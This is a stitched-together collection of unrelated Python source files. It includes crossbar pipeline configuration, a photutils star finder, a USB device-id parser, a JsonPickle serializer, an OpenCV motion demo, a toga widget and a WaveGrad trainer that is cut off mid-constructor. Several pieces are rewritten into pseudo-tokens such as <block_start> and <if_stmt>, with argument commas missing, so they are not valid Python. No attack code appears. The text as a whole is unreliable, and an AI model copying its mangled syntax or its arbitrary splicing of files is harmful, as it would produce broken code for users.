{}, pass={}, depth={}".format(dnode.name dnode.hpass 
dnode.hdepth))<block_end><elif_stmt>dnode.node_type<eq>NodeType.SOCKET_M1<block_start>idx=dnode.us.index(host.ds[0])<if_stmt>full_fifo<block_start>log.info("fifo present no bypass")<line_sep>dnode.hpass=dnode.hpass&~(1<lshift>idx)<line_sep>dnode.hdepth=dnode.hdepth|(2<lshift>idx<times>4)<block_end><elif_stmt>fifo_passthru<block_start>log.info("fifo present with bypass")<line_sep>dnode.hpass=dnode.hpass|(1<lshift>idx)<line_sep>dnode.hdepth=dnode.hdepth|(2<lshift>idx<times>4)<block_end><elif_stmt>full_passthru<block_start>log.info("fifo not present")<line_sep>dnode.hpass=dnode.hpass|(1<lshift>idx)<line_sep>dnode.hdepth=dnode.hdepth&~(0xF<lshift>idx<times>4)<block_end>log.info("Finished processing socketm1 {}, pass={}, depth={}".format(dnode.name dnode.hpass dnode.hdepth))<block_end><block_end><for_stmt>device xbar.devices# go upstream and set DReq/RspPass at the first instance. # If it is async, skip # If Socket M1 # If pipeline True and bypass False, set dpass to 0 # If pipeline False, set depth to 0 # If Socket 1N, find position of the device and follow procedure above # If it is host, ignore <block_start>log.info("Processing pipeline for device {}".format(device.name))<line_sep># FIFO present with no passthrough option # FIFO present with passthrough option # FIFO not present and full passthrough 
full_fifo=<false><line_sep>fifo_passthru=<false><line_sep>full_passthru=<true><if_stmt>device.pipeline<is><true><and>device.pipeline_byp<is><false><block_start>full_fifo=<true><block_end><elif_stmt>device.pipeline<is><true><and>device.pipeline_byp<is><true><block_start>fifo_passthru=<true><block_end><elif_stmt>device.pipeline<is><false><block_start>full_passthru=<true><block_end>unode=device.us[0].us<if_stmt>unode.node_type<eq>NodeType.ASYNC_FIFO<block_start><continue><block_end><if_stmt>unode.node_type<eq>NodeType.SOCKET_1N<block_start>idx=unode.ds.index(device.us[0])<if_stmt>full_fifo<block_start>unode.dpass=unode.dpass&~(1<lshift>idx)<line_sep>unode.ddepth=unode.ddepth|(2<lshift>idx<times>4)<block_end><elif_stmt>fifo_passthru<block_start>unode.dpass=unode.dpass|(1<lshift>idx)<line_sep>unode.ddepth=unode.ddepth|(2<lshift>idx<times>4)<block_end><elif_stmt>full_passthru<block_start>unode.dpass=unode.dpass|(1<lshift>idx)<line_sep>unode.ddepth=unode.ddepth&~(0xF<lshift>idx<times>4)<block_end>log.info("Finished processing socket1n {}, pass={:x}, depth={:x}".format(unode.name unode.dpass unode.ddepth))<block_end><elif_stmt>unode.node_type<eq>NodeType.SOCKET_M1<block_start><if_stmt>full_fifo<block_start>log.info("Fifo present with no passthrough")<line_sep>unode.dpass=0<line_sep>unode.ddepth=2<block_end><elif_stmt>fifo_passthru<block_start>log.info("Fifo present with passthrough")<line_sep>unode.dpass=0<line_sep>unode.ddepth=2<block_end><elif_stmt>full_passthru<block_start>log.info("No Fifo")<line_sep>unode.dpass=1<line_sep>unode.ddepth=0<block_end>log.info("Finished processing socketm1 {}, pass={:x}, depth={:x}".format(unode.name unode.dpass unode.ddepth))<block_end><block_end><return>xbar<block_end>
# -*- coding: utf-8 -*- """ lassie.compat ~~~~~~~~~~~~~ This module contains imports and declarations for seamless Python 2 and Python 3 compatibility. """<import_stmt>sys<line_sep>_ver=sys.version_info<line_sep>#: Python 2.x? is_py2=(_ver[0]<eq>2)<line_sep>#: Python 3.x? is_py3=(_ver[0]<eq>3)<if_stmt>is_py2<block_start><import_from_stmt>urlparse urljoin urlparse<line_sep>str=unicode<block_end><elif_stmt>is_py3<block_start><import_from_stmt>urllib.parse urljoin urlparse<line_sep>str=str<block_end>
# Licensed under a 3-clause BSD style license - see LICENSE.rst """ This module implements the IRAFStarFinder class. """<import_stmt>inspect<import_stmt>warnings<import_from_stmt>astropy.nddata extract_array<import_from_stmt>astropy.table QTable<import_from_stmt>astropy.utils lazyproperty<import_stmt>numpy<as>np<import_from_stmt>.core StarFinderBase _StarFinderKernel<import_from_stmt>..utils._convolution _filter_data<import_from_stmt>..utils._misc _get_version_info<import_from_stmt>..utils._moments _moments _moments_central<import_from_stmt>..utils.exceptions NoDetectionsWarning<line_sep>__all__=['IRAFStarFinder']<class_stmt>IRAFStarFinder(StarFinderBase)<block_start>""" Detect stars in an image using IRAF's "starfind" algorithm. `IRAFStarFinder` searches images for local density maxima that have a peak amplitude greater than ``threshold`` above the local background and have a PSF full-width at half-maximum similar to the input ``fwhm``. The objects' centroid, roundness (ellipticity), and sharpness are calculated using image moments. Parameters ---------- threshold : float The absolute image value above which to select sources. fwhm : float The full-width half-maximum (FWHM) of the 2D circular Gaussian kernel in units of pixels. minsep_fwhm : float, optional The minimum separation for detected objects in units of ``fwhm``. sigma_radius : float, optional The truncation radius of the Gaussian kernel in units of sigma (standard deviation) [``1 sigma = FWHM / 2.0*sqrt(2.0*log(2.0))``]. sharplo : float, optional The lower bound on sharpness for object detection. sharphi : float, optional The upper bound on sharpness for object detection. roundlo : float, optional The lower bound on roundness for object detection. roundhi : float, optional The upper bound on roundness for object detection. sky : float, optional The background sky level of the image. Inputing a ``sky`` value will override the background sky estimate. 
Setting ``sky`` affects only the output values of the object ``peak``, ``flux``, and ``mag`` values. The default is ``None``, which means the sky value will be estimated using the `starfind`_ method. exclude_border : bool, optional Set to `True` to exclude sources found within half the size of the convolution kernel from the image borders. The default is `False`, which is the mode used by `starfind`_. brightest : int, None, optional Number of brightest objects to keep after sorting the full object list. If ``brightest`` is set to `None`, all objects will be selected. peakmax : float, None, optional Maximum peak pixel value in an object. Only objects whose peak pixel values are *strictly smaller* than ``peakmax`` will be selected. This may be used to exclude saturated sources. By default, when ``peakmax`` is set to `None`, all objects will be selected. .. warning:: `IRAFStarFinder` automatically excludes objects whose peak pixel values are negative. Therefore, setting ``peakmax`` to a non-positive value would result in exclusion of all objects. xycoords : `None` or Nx2 `~numpy.ndarray` The (x, y) pixel coordinates of the approximate centroid positions of identified sources. If ``xycoords`` are input, the algorithm will skip the source-finding step. Notes ----- For the convolution step, this routine sets pixels beyond the image borders to 0.0. The equivalent parameters in IRAF's `starfind`_ are ``boundary='constant'`` and ``constant=0.0``. IRAF's `starfind`_ uses ``hwhmpsf``, ``fradius``, and ``sepmin`` as input parameters. The equivalent input values for `IRAFStarFinder` are: * ``fwhm = hwhmpsf * 2`` * ``sigma_radius = fradius * sqrt(2.0*log(2.0))`` * ``minsep_fwhm = 0.5 * sepmin`` The main differences between `~photutils.detection.DAOStarFinder` and `~photutils.detection.IRAFStarFinder` are: * `~photutils.detection.IRAFStarFinder` always uses a 2D circular Gaussian kernel, while `~photutils.detection.DAOStarFinder` can use an elliptical Gaussian kernel. 
* `~photutils.detection.IRAFStarFinder` calculates the objects' centroid, roundness, and sharpness using image moments. See Also -------- DAOStarFinder References ---------- .. [1] https://iraf.net/irafhelp.php?val=starfind .. _starfind: https://iraf.net/irafhelp.php?val=starfind """<def_stmt>__init__ self threshold fwhm sigma_radius=1.5 minsep_fwhm=2.5 sharplo=0.5 sharphi=2.0 roundlo=0.0 roundhi=0.2 sky=<none> exclude_border=<false> brightest=<none> peakmax=<none> xycoords=<none><block_start><if_stmt><not>np.isscalar(threshold)<block_start><raise>TypeError('threshold must be a scalar value.')<block_end><if_stmt><not>np.isscalar(fwhm)<block_start><raise>TypeError('fwhm must be a scalar value.')<block_end>self.threshold=threshold<line_sep>self.fwhm=fwhm<line_sep>self.sigma_radius=sigma_radius<line_sep>self.minsep_fwhm=minsep_fwhm<line_sep>self.sharplo=sharplo<line_sep>self.sharphi=sharphi<line_sep>self.roundlo=roundlo<line_sep>self.roundhi=roundhi<line_sep>self.sky=sky<line_sep>self.exclude_border=exclude_border<line_sep>self.brightest=self._validate_brightest(brightest)<line_sep>self.peakmax=peakmax<if_stmt>xycoords<is><not><none><block_start>xycoords=np.asarray(xycoords)<if_stmt>xycoords.ndim<ne>2<or>xycoords.shape[1]<ne>2<block_start><raise>ValueError('xycoords must be shaped as a Nx2 array')<block_end><block_end>self.xycoords=xycoords<line_sep>self.kernel=_StarFinderKernel(self.fwhm ratio=1.0 theta=0.0 sigma_radius=self.sigma_radius)<line_sep>self.min_separation=max(2 int((self.fwhm<times>self.minsep_fwhm)+0.5))<block_end>@staticmethod<def_stmt>_validate_brightest brightest<block_start><if_stmt>brightest<is><not><none><block_start><if_stmt>brightest<le>0<block_start><raise>ValueError('brightest must be >= 0')<block_end>bright_int=int(brightest)<if_stmt>bright_int<ne>brightest<block_start><raise>ValueError('brightest must be an integer')<block_end>brightest=bright_int<block_end><return>brightest<block_end><def_stmt>_get_raw_catalog self data 
mask=<none><block_start>convolved_data=_filter_data(data self.kernel.data mode='constant' fill_value=0.0 check_normalization=<false>)<if_stmt>self.xycoords<is><none><block_start>xypos=self._find_stars(convolved_data self.kernel self.threshold min_separation=self.min_separation mask=mask exclude_border=self.exclude_border)<block_end><else_stmt><block_start>xypos=self.xycoords<block_end><if_stmt>xypos<is><none><block_start>warnings.warn('No sources were found.' NoDetectionsWarning)<line_sep><return><none><block_end>cat=_IRAFStarFinderCatalog(data convolved_data xypos self.kernel sky=self.sky sharplo=self.sharplo sharphi=self.sharphi roundlo=self.roundlo roundhi=self.roundhi brightest=self.brightest peakmax=self.peakmax)<line_sep><return>cat<block_end><def_stmt>find_stars self data mask=<none><block_start>""" Find stars in an astronomical image. Parameters ---------- data : 2D array_like The 2D image array. mask : 2D bool array, optional A boolean mask with the same shape as ``data``, where a `True` value indicates the corresponding element of ``data`` is masked. Masked pixels are ignored when searching for stars. Returns ------- table : `~astropy.table.QTable` or `None` A table of found objects with the following parameters: * ``id``: unique object identification number. * ``xcentroid, ycentroid``: object centroid. * ``fwhm``: object FWHM. * ``sharpness``: object sharpness. * ``roundness``: object roundness. * ``pa``: object position angle (degrees counter clockwise from the positive x axis). * ``npix``: the total number of (positive) unmasked pixels. * ``sky``: the local ``sky`` value. * ``peak``: the peak, sky-subtracted, pixel value of the object. * ``flux``: the object instrumental flux. * ``mag``: the object instrumental magnitude calculated as ``-2.5 * log10(flux)``. `None` is returned if no stars are found. 
"""<line_sep>cat=self._get_raw_catalog(data mask=mask)<if_stmt>cat<is><none><block_start><return><none><block_end># apply all selection filters cat=cat.apply_all_filters()<if_stmt>cat<is><none><block_start><return><none><block_end># create the output table <return>cat.to_table()<block_end><block_end><class_stmt>_IRAFStarFinderCatalog<block_start>""" Class to create a catalog of the properties of each detected star, as defined by IRAF's ``starfind`` task. Parameters ---------- data : 2D `~numpy.ndarray` The 2D image. convolved_data : 2D `~numpy.ndarray` The convolved 2D image. xypos: Nx2 `numpy.ndarray` A Nx2 array of (x, y) pixel coordinates denoting the central positions of the stars. kernel : `_StarFinderKernel` The convolution kernel. This kernel must match the kernel used to create the ``convolved_data``. sky : `None` or float, optional The local sky level around the source. If sky is ``None``, then a local sky level will be (crudely) estimated using the IRAF ``starfind`` calculation. 
"""<def_stmt>__init__ self data convolved_data xypos kernel sky=<none> sharplo=0.2 sharphi=1.0 roundlo=-1.0 roundhi=1.0 brightest=<none> peakmax=<none><block_start>self.data=data<line_sep>self.convolved_data=convolved_data<line_sep>self.xypos=xypos<line_sep>self.kernel=kernel<line_sep>self._sky=sky<line_sep>self.sharplo=sharplo<line_sep>self.sharphi=sharphi<line_sep>self.roundlo=roundlo<line_sep>self.roundhi=roundhi<line_sep>self.brightest=brightest<line_sep>self.peakmax=peakmax<line_sep>self.id=np.arange(len(self))+1<line_sep>self.cutout_shape=kernel.shape<line_sep>self.default_columns=('id' 'xcentroid' 'ycentroid' 'fwhm' 'sharpness' 'roundness' 'pa' 'npix' 'sky' 'peak' 'flux' 'mag')<block_end><def_stmt>__len__ self<block_start><return>len(self.xypos)<block_end><def_stmt>__getitem__ self index<block_start>newcls=object.__new__(self.__class__)<line_sep>init_attr=('data' 'convolved_data' 'kernel' '_sky' 'sharplo' 'sharphi' 'roundlo' 'roundhi' 'brightest' 'peakmax' 'cutout_shape' 'default_columns')<for_stmt>attr init_attr<block_start>setattr(newcls attr getattr(self attr))<block_end># xypos determines ordering and isscalar # NOTE: always keep as a 2D array, even for a single source attr='xypos'<line_sep>value=getattr(self attr)[index]<line_sep>setattr(newcls attr np.atleast_2d(value))<line_sep>keys=set(self.__dict__.keys())&set(self._lazyproperties)<line_sep>keys.add('id')<for_stmt>key keys<block_start>value=self.__dict__[key]<line_sep># do not insert lazy attributes that are always scalar (e.g., # isscalar), i.e., not an array/list for each source <if_stmt>np.isscalar(value)<block_start><continue><block_end># value is always at least a 1D array, even for a single source value=np.atleast_1d(value[index])<line_sep>newcls.__dict__[key]=value<block_end><return>newcls<block_end>@lazyproperty<def_stmt>isscalar self<block_start>""" Whether the instance is scalar (e.g., a single source). 
"""<line_sep><return>self.xypos.shape<eq>(1 2)<block_end>@property<def_stmt>_lazyproperties self<block_start>""" Return all lazyproperties (even in superclasses). """<def_stmt>islazyproperty obj<block_start><return>isinstance(obj lazyproperty)<block_end><return>[i[0]<for>i inspect.getmembers(self.__class__ predicate=islazyproperty)]<block_end><def_stmt>reset_ids self<block_start>"""Reset the ID column to be consecutive integers."""<line_sep>self.id=np.arange(len(self))+1<block_end>@lazyproperty<def_stmt>sky self<block_start><if_stmt>self._sky<is><none><block_start>skymask=~self.kernel.mask.astype(bool)# 1=sky, 0=obj nsky=np.count_nonzero(skymask)<line_sep>axis=(1 2)<if_stmt>nsky<eq>0.<block_start>sky=(np.max(self.cutout_data_nosub axis=axis)-np.max(self.cutout_convdata axis=axis))<block_end><else_stmt><block_start>sky=(np.sum(self.cutout_data_nosub<times>skymask axis=axis)/nsky)<block_end><block_end><else_stmt><block_start>sky=np.full(len(self) fill_value=self._sky)<block_end><return>sky<block_end><def_stmt>make_cutouts self data<block_start>cutouts=[]<for_stmt>xpos,ypos self.xypos<block_start>cutouts.append(extract_array(data self.cutout_shape (ypos xpos) fill_value=0.0))<block_end><return>np.array(cutouts)<block_end>@lazyproperty<def_stmt>cutout_data_nosub self<block_start><return>self.make_cutouts(self.data)<block_end>@lazyproperty<def_stmt>cutout_data self<block_start>data=((self.cutout_data_nosub-self.sky[: np.newaxis np.newaxis])<times>self.kernel.mask)<line_sep># IRAF starfind discards negative pixels data[data<l>0]=0.0<line_sep><return>data<block_end>@lazyproperty<def_stmt>cutout_convdata self<block_start><return>self.make_cutouts(self.convolved_data)<block_end>@lazyproperty<def_stmt>npix self<block_start><return>np.count_nonzero(self.cutout_data axis=(1 2))<block_end>@lazyproperty<def_stmt>moments self<block_start><return>np.array([_moments(arr order=1)<for>arr self.cutout_data])<block_end>@lazyproperty<def_stmt>cutout_centroid 
self<block_start>moments=self.moments<line_sep># ignore divide-by-zero RuntimeWarning <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter('ignore' RuntimeWarning)<line_sep>ycentroid=moments[: 1 0]/moments[: 0 0]<line_sep>xcentroid=moments[: 0 1]/moments[: 0 0]<block_end><return>np.transpose((ycentroid xcentroid))<block_end>@lazyproperty<def_stmt>cutout_xcentroid self<block_start><return>np.transpose(self.cutout_centroid)[1]<block_end>@lazyproperty<def_stmt>cutout_ycentroid self<block_start><return>np.transpose(self.cutout_centroid)[0]<block_end>@lazyproperty<def_stmt>cutout_xorigin self<block_start><return>np.transpose(self.xypos)[0]-self.kernel.xradius<block_end>@lazyproperty<def_stmt>cutout_yorigin self<block_start><return>np.transpose(self.xypos)[1]-self.kernel.yradius<block_end>@lazyproperty<def_stmt>xcentroid self<block_start><return>self.cutout_xcentroid+self.cutout_xorigin<block_end>@lazyproperty<def_stmt>ycentroid self<block_start><return>self.cutout_ycentroid+self.cutout_yorigin<block_end>@lazyproperty<def_stmt>peak self<block_start><return>np.array([np.max(arr)<for>arr self.cutout_data])<block_end>@lazyproperty<def_stmt>flux self<block_start><return>np.array([np.sum(arr)<for>arr self.cutout_data])<block_end>@lazyproperty<def_stmt>mag self<block_start><return>-2.5<times>np.log10(self.flux)<block_end>@lazyproperty<def_stmt>moments_central self<block_start>moments=np.array([_moments_central(arr center=(xcen_ ycen_) order=2)<for>arr,xcen_,ycen_ zip(self.cutout_data self.cutout_xcentroid self.cutout_ycentroid)])<line_sep><return>moments/self.moments[: 0 0][: np.newaxis np.newaxis]<block_end>@lazyproperty<def_stmt>mu_sum self<block_start><return>self.moments_central[: 0 2]+self.moments_central[: 2 0]<block_end>@lazyproperty<def_stmt>mu_diff self<block_start><return>self.moments_central[: 0 2]-self.moments_central[: 2 0]<block_end>@lazyproperty<def_stmt>fwhm 
self<block_start><return>2.0<times>np.sqrt(np.log(2.0)<times>self.mu_sum)<block_end>@lazyproperty<def_stmt>roundness self<block_start><return>np.sqrt(self.mu_diff<power>2+4.0<times>self.moments_central[: 1 1]<power>2)/self.mu_sum<block_end>@lazyproperty<def_stmt>sharpness self<block_start><return>self.fwhm/self.kernel.fwhm<block_end>@lazyproperty<def_stmt>pa self<block_start>pa=np.rad2deg(0.5<times>np.arctan2(2.0<times>self.moments_central[: 1 1] self.mu_diff))<line_sep>pa=np.where(pa<l>0 pa+180 pa)<line_sep><return>pa<block_end><def_stmt>apply_filters self<block_start>"""Filter the catalog."""<line_sep>mask=np.count_nonzero(self.cutout_data axis=(1 2))<g>1<line_sep>mask<augand>((self.sharpness<g>self.sharplo)&(self.sharpness<l>self.sharphi)&(self.roundness<g>self.roundlo)&(self.roundness<l>self.roundhi))<if_stmt>self.peakmax<is><not><none><block_start>mask<augand>(self.peak<l>self.peakmax)<block_end>newcat=self[mask]<if_stmt>len(newcat)<eq>0<block_start>warnings.warn('Sources were found, but none pass the sharpness, '<concat>'roundness, or peakmax criteria' NoDetectionsWarning)<line_sep><return><none><block_end><return>newcat<block_end><def_stmt>select_brightest self<block_start>""" Sort the catalog by the brightest fluxes and select the top brightest sources. """<line_sep>newcat=self<if_stmt>self.brightest<is><not><none><block_start>idx=np.argsort(self.flux)[::-1][:self.brightest]<line_sep>newcat=self[idx]<block_end><return>newcat<block_end><def_stmt>apply_all_filters self<block_start>""" Apply all filters, select the brightest, and reset the source ids. 
"""<line_sep>cat=self.apply_filters()<if_stmt>cat<is><none><block_start><return><none><block_end>cat=cat.select_brightest()<line_sep>cat.reset_ids()<line_sep><return>cat<block_end><def_stmt>to_table self columns=<none><block_start>meta={'version':_get_version_info()}<line_sep>table=QTable(meta=meta)<if_stmt>columns<is><none><block_start>columns=self.default_columns<block_end><for_stmt>column columns<block_start>table[column]=getattr(self column)<block_end><return>table<block_end><block_end>
import re

# Matches a "vid_XXXX&pid_YYYY" fragment of a Windows device-instance path,
# delimited on the left by '#' or '\' and on the right by '&', '#', or '\'.
# Compiled once at import time instead of on every call.
_VID_PID_RE = re.compile(r'(#|\\)vid_([a-f0-9]{4})&pid_([a-f0-9]{4})(&|#|\\)',
                         re.IGNORECASE)


def parseDeviceId(id):
    """Extract the USB vendor and product ids from a device-instance path.

    Parameters
    ----------
    id : str
        A Windows device-instance path such as
        ``\\\\?\\usb#vid_045e&pid_00cb#...``.

    Returns
    -------
    list
        ``[vid, pid]`` as ints parsed from hexadecimal, or ``[None, None]``
        when the path contains no vid/pid pair.
    """
    match = _VID_PID_RE.search(id)
    return [int(match.group(i), 16) if match else None for i in [2, 3]]
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""JsonPickle

A simplified form of 'pickle' that only pickles ComputedGraph locations and
'simple' python objects (e.g. those for whom eval(repr(x)) == x).

In this case, we don't pickle to a string - we pickle to 'simple' python
objects, which are very close to json.

NOTE(review): this module uses Python 2 builtins (`long`, `unicode`,
`dict.iteritems`) and is not Python 3 compatible.
"""

import sys


class Pickleable(object):
    """Mixin class to indicate that a class supports JsonPickle serialization.

    Classes must expose methods

        __reduce__(self): return (cls, ({..kwds},))

    we will then call cls(**kwds) to inflate. cls must descend from
    'Pickleable'.

    By default, we just use the dict of the object and its own type.
    """
    def __reduce__(self):
        return (type(self), (self.__dict__,))


# Set of other classes we are allowed to unpickle.  Mostly to allow for
# boost::python classes, which can't easily descend from 'Pickleable'.
unpickleWhitelist_ = set()


def addClassToPickleWhitelist(cls):
    """Add a class that doesn't descend from Pickleable to the pickle whitelist"""
    unpickleWhitelist_.add(cls)


# One-character tags identifying how each value was encoded.
ENCODING_OBJECT = 'o'
ENCODING_SIMPLE_PYTHON = 'P'
ENCODING_UNICODE = 'u'
ENCODING_INT = 'i'
ENCODING_LONG = 'l'
ENCODING_TUPLE = '()'
ENCODING_LIST = '[]'
ENCODING_DICT = '{}'

# A dictionary from string to ComputedGraph.Location subclasses.
locationTypes_ = {}

# A dictionary from a ComputedGraph type to a key that can be used in place
# of the usual (clsModule, clsName) pair.
locationTypeOverrides_ = {}


def addOverride(cls, override):
    """Override the serializer to use 'override' as the identifier for 'cls'.

    This is primarily to shorten the amount of data in the representation and
    to allow the representation to remain constant even if classes are moving
    around or changing names.

    override may not be a tuple.
    """
    assert cls not in locationTypeOverrides_
    assert not isinstance(override, tuple)

    locationTypeOverrides_[cls] = override
    locationTypes_[override] = cls


def addClassAlias(cls, override):
    """Register an additional decode-only identifier for 'cls'."""
    locationTypes_[override] = cls


def classFromModuleAndName(clsModuleAndName):
    """Resolve an encoded class key back to the class object.

    'clsModuleAndName' is either an override key registered via addOverride /
    addClassAlias, or a (moduleName, className) tuple, in which case the
    module is imported on first use and the class is cached.

    Raises UserWarning when the module or class can't be found, or when the
    class is neither Pickleable nor whitelisted.
    """
    if clsModuleAndName in locationTypeOverrides_:
        # NOTE(review): locationTypeOverrides_ maps class -> override key, so
        # this branch only fires when a class object itself is passed in;
        # preserved as-is to keep behavior unchanged.
        return locationTypeOverrides_[clsModuleAndName]

    if clsModuleAndName not in locationTypes_:
        __import__(clsModuleAndName[0])
        try:
            module = sys.modules[clsModuleAndName[0]]
        except KeyError:
            # BUG FIX: the message was passed as a second constructor
            # argument instead of being %-formatted into the string.
            raise UserWarning("Couldn't import module %s" % clsModuleAndName[0])

        try:
            cls = module.__dict__[clsModuleAndName[1]]
        except KeyError:
            raise UserWarning(
                "Can't find %s in %s" % (clsModuleAndName[1], module.__name__))

        if not issubclass(cls, Pickleable) and cls not in unpickleWhitelist_:
            raise UserWarning(
                "%s is not a computed graph location type" % (clsModuleAndName,))

        locationTypes_[clsModuleAndName] = cls

    return locationTypes_[clsModuleAndName]


def toSimple(complexObject):
    """Encode 'complexObject' into a (tag, payload) simple-python pair.

    Plain python scalars pass through tagged ENCODING_SIMPLE_PYTHON; ints,
    longs and unicode get explicit tags; containers recurse; anything else
    must support the Pickleable __reduce__ protocol.
    """
    if complexObject is None:
        return (ENCODING_SIMPLE_PYTHON, None)

    if isinstance(complexObject, (float, str, bool)):
        return (ENCODING_SIMPLE_PYTHON, complexObject)

    # ints and longs are rendered as strings so arbitrarily large values
    # survive a round-trip through json.
    if isinstance(complexObject, int):
        return (ENCODING_INT, str(complexObject))

    if isinstance(complexObject, long):
        return (ENCODING_LONG, str(complexObject))

    if isinstance(complexObject, unicode):
        return (ENCODING_UNICODE, complexObject.encode('utf-8'))

    if isinstance(complexObject, tuple):
        subs = []
        allArePurePython = True
        for x in complexObject:
            encoding, simpleForm = toSimple(x)
            if encoding != ENCODING_SIMPLE_PYTHON:
                allArePurePython = False
            subs.append((encoding, simpleForm))
        if allArePurePython:
            # Every element is simple python, so the tuple can pass through
            # untouched under the simple-python tag.
            return (ENCODING_SIMPLE_PYTHON, complexObject)
        return (ENCODING_TUPLE, tuple(subs))

    if isinstance(complexObject, list):
        return (ENCODING_LIST, tuple([toSimple(x) for x in complexObject]))

    if isinstance(complexObject, dict):
        subs = []
        for key, val in complexObject.iteritems():
            subs.append((toSimple(key), toSimple(val)))
        # Sorting makes the encoding deterministic regardless of dict order.
        return (ENCODING_DICT, tuple(sorted(subs)))

    try:
        cls, args = complexObject.__reduce__()
    except Exception:
        # BUG FIX: the offending object was passed as a second constructor
        # argument instead of being %-formatted into the message.
        raise UserWarning("Couldn't call __reduce__ on %s" % (complexObject,))

    if cls in locationTypeOverrides_:
        clsKey = locationTypeOverrides_[cls]
    else:
        clsKey = (cls.__module__, cls.__name__)

    return (ENCODING_OBJECT, (clsKey, toSimple(args[0])))


def toComplex(simpleObject):
    """Convert 'simpleObject' from a simplified form to the full CG form."""
    if simpleObject[0] == ENCODING_SIMPLE_PYTHON:
        return simpleObject[1]
    if simpleObject[0] == ENCODING_INT:
        return int(simpleObject[1])
    if simpleObject[0] == ENCODING_UNICODE:
        return unicode(simpleObject[1], 'utf-8')
    if simpleObject[0] == ENCODING_LONG:
        return long(simpleObject[1])
    if simpleObject[0] == ENCODING_TUPLE:
        return tuple([toComplex(x) for x in simpleObject[1]])
    if simpleObject[0] == ENCODING_LIST:
        return [toComplex(x) for x in simpleObject[1]]
    if simpleObject[0] == ENCODING_DICT:
        return dict((toComplex(k), toComplex(v)) for k, v in simpleObject[1])
    elif simpleObject[0] == ENCODING_OBJECT:
        clsModuleAndName = simpleObject[1][0]
        args = simpleObject[1][1]

        cls = classFromModuleAndName(clsModuleAndName)
        kwds = toComplex(args)
        try:
            return cls(**kwds)
        except Exception:
            raise UserWarning(
                "Failed to construct instance of %s with %s" % (cls, kwds))

    raise UserWarning("Badly encoded object")


import ufora.native.Json as JsonNative


def toJson(complexObject):
    """Encode 'complexObject' all the way to a native Json value."""
    return JsonNative.Json.fromSimple(toSimple(complexObject))


def fromJson(jsonForm):
    """Inverse of toJson: decode a native Json value back to the CG form."""
    return toComplex(jsonForm.toSimple())
import cv2
import numpy as np


def get_frame(cap, scaling_factor=0.5):
    """Read one frame from the capture object, scaled down by *scaling_factor*."""
    ret, frame = cap.read()
    frame = cv2.resize(frame, None, fx=scaling_factor, fy=scaling_factor,
                       interpolation=cv2.INTER_AREA)
    return frame


if __name__ == '__main__':
    # Open the video capture device.
    cap = cv2.VideoCapture(1)

    # Background subtractor based on a Mixture-of-Gaussians model.
    bgSubtractor = cv2.createBackgroundSubtractorMOG2()

    # 'history' sets the model's learning rate (applied as 1/history below):
    # a larger value makes the background model adapt more slowly.
    history = 100

    # Process frames until the user presses ESC.
    while True:
        frame = get_frame(cap, 0.5)

        # Update the background model and get the foreground mask.
        mask = bgSubtractor.apply(frame, learningRate=1.0 / history)

        # Expand the single-channel mask to 3 channels so it can be
        # combined with the color frame.
        mask = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)

        cv2.imshow('Input frame', frame)
        cv2.imshow('Moving Objects MOG', mask & frame)

        c = cv2.waitKey(delay=30)
        if c == 27:  # ESC
            break

    cap.release()
    cv2.destroyAllWindows()
from travertino.size import at_least

from toga_cocoa.libs import SEL, NSPopUpButton, objc_method

from .base import Widget


class TogaPopupButton(NSPopUpButton):
    @objc_method
    def onSelect_(self, obj) -> None:
        # Forward the Cocoa action to the interface-level handler, if set.
        if self.interface.on_select:
            self.interface.on_select(self.interface)


class Selection(Widget):
    """Cocoa backend for the toga Selection (popup button) widget."""

    def create(self):
        self.native = TogaPopupButton.alloc().init()
        self.native.interface = self.interface
        # Route native click events back to onSelect_ above.
        self.native.target = self.native
        self.native.action = SEL('onSelect:')
        self.add_constraints()

    def rehint(self):
        size = self.native.intrinsicContentSize()
        self.interface.intrinsic.height = size.height
        self.interface.intrinsic.width = at_least(
            max(self.interface.MIN_WIDTH, size.width))

    def remove_all_items(self):
        self.native.removeAllItems()

    def add_item(self, item):
        self.native.addItemWithTitle(item)

    def select_item(self, item):
        self.native.selectItemWithTitle(item)

    def get_selected_item(self):
        return str(self.native.titleOfSelectedItem)

    def set_on_select(self, handler):
        # Nothing to do: the native control always targets onSelect_, which
        # reads the current handler from the interface.
        pass
# Copyright 2020 LMNT, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

import numpy as np
import os
import torch
import torch.nn as nn

from torch.nn.parallel import DistributedDataParallel
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm

from wavegrad.dataset import from_path as dataset_from_path
from wavegrad.model import WaveGrad


def _nested_map(struct, map_fn):
    """Apply map_fn to every leaf of a nested tuple/list/dict structure."""
    if isinstance(struct, tuple):
        return tuple(_nested_map(x, map_fn) for x in struct)
    if isinstance(struct, list):
        return [_nested_map(x, map_fn) for x in struct]
    if isinstance(struct, dict):
        return {k: _nested_map(v, map_fn) for k, v in struct.items()}
    return map_fn(struct)


class WaveGradLearner:
    """Training loop for WaveGrad: optimization, checkpointing and logging."""

    def __init__(self, model_dir, model, dataset, optimizer, params, *args, **kwargs):
        os.makedirs(model_dir, exist_ok=True)
        self.model_dir = model_dir
        self.model = model
        self.dataset = dataset
        self.optimizer = optimizer
        self.params = params
        self.autocast = torch.cuda.amp.autocast(enabled=kwargs.get('fp16', False))
        self.scaler = torch.cuda.amp.GradScaler(enabled=kwargs.get('fp16', False))
        self.step = 0
        self.is_master = True

        # Cumulative noise levels: noise_level[s] = sqrt(prod_{i<=s}(1-beta_i)),
        # with a leading 1.0 so that index s-1 yields the previous level.
        beta = np.array(self.params.noise_schedule)
        noise_level = np.cumprod(1 - beta)**0.5
        noise_level = np.concatenate([[1.0], noise_level], axis=0)
